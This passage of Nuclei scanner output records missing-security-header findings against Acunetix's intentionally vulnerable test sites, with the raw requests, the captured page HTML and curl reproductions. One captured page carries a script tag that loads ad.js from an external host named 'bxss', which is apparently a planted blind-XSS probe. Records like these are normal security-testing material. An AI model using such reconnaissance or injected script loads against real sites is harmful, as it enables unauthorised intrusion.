\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:08.910363203Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:09.39205769Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/css\",\"path\":\"/static/css\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/css/\",\"request\":\"GET /static/css HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:09.540972323Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" 